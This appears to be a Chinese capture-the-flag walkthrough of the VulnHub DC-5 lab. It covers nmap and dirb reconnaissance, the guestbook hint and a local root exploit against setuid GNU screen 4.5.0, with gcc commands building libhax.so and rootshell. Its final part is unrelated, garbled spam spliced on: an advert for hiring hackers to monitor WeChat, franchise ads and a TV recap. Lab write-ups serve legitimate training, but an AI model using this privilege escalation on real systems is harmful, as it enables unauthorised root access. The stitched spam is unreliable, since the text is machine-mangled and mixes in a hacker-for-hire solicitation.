靶场名称: DC: 5
靶场发布时间:2019-4-21
靶场地址:https://www.vulnhub.com/entry/dc-5,314/
靶场描述:
DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).
As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.
And just for the record, there is no phpmailer exploit involved. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
But if you're really, really stuck, you can watch this video which shows the first step.
VMware虚拟机(桥接模式)
获取靶机的IP
nmap -sn 192.168.3.0/24
使用nmap来查看靶机的端口信息和系统信息等等
首先去查看80端口的web服务
没有什么明显的信息就 一个留言框,使用dirb扫描一下目录
没有扫描到什么有用的页面,一些说明文件尝试也没有
继续尝试留言框
提交后年份就变了
gcc -fPIC -shared -ldl -o libhax.so libhax.c
报错,但是程序出来了
第二步:创建rootshell并编译文件(攻击机编译即可)
gcc -o rootshell rootshell.c
第三步:修改.sh文件
#!/bin/bash # screenroot.sh # setuid screen v4.5.0 local root exploit # abuses ld.so.preload overwriting to get root. # bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html # HACK THE PLANET # ~ infodox (25/1/2017) echo "~ gnu/screenroot ~" echo "[+] First, we create our shell and library..."
screen -ls # screen itself is setuid,so...
/tmp/rootshell
在保存文件的时候 需要执行运行环境 不然会报错的
把这三个文件上传到靶机中
直接下载libhax.so (apache服务下载不下来)
使用 python -m http.server port 既可以下载 chmod777 权限后 就获取到root权限
在每小我私家步入社会上班打拼之后,总会有着制止不了的同学集会,在集会上,面临着一些事业有成有所作为的同学伴侣,总会有几小我私家在一旁叹息羡慕。而此刻的你,是想要成为被羡慕的人,照旧想要成为羡慕别人的人...
「微信监视_微信群代炸黑客联系方式-雇佣黑客在哪找」http://cp.acfun.tv $html.=''; 192.168.1.2 ether 0A-11-22-...
一个靠谱的加盟项目老是可以或许为加盟商带来一份惊喜的,这份惊喜不只仅是名望上的,更是利润上的惊喜,选择加盟妻子来了零食是可以或许为加盟商带来很是大的利润的。这样一个有名气的加盟项目,是值得我们各人去就...
OPlayer 2.0.122014/3/13 15:56该缝隙初次露脸是在名为“沙虫”的俄罗斯黑客安排进犯运用的时分呈现的。 进犯方针包含北约、乌克兰ZF安排、西欧ZF安排、能源行业企业(特别波兰)...
编辑导读:对付一些TO B企业来说,如何吸引商家入驻很洪流平上要靠平台展示页。既要有吸引商家入驻的权益,又要富有设计感,这就很检验设计师的功底。本文作者将从自身事情履历出发,谈谈如何设计网页的商家当物...
小红袄是谁(小红袄为什么杀小朵) 宇哥带你读原著,一起来看热播电视剧《新世界》第十回。 从原著出发,更深入。 十七 70集《新世界》的另一个名字别称“寻找小红袄”,终于在第59集的时候,给...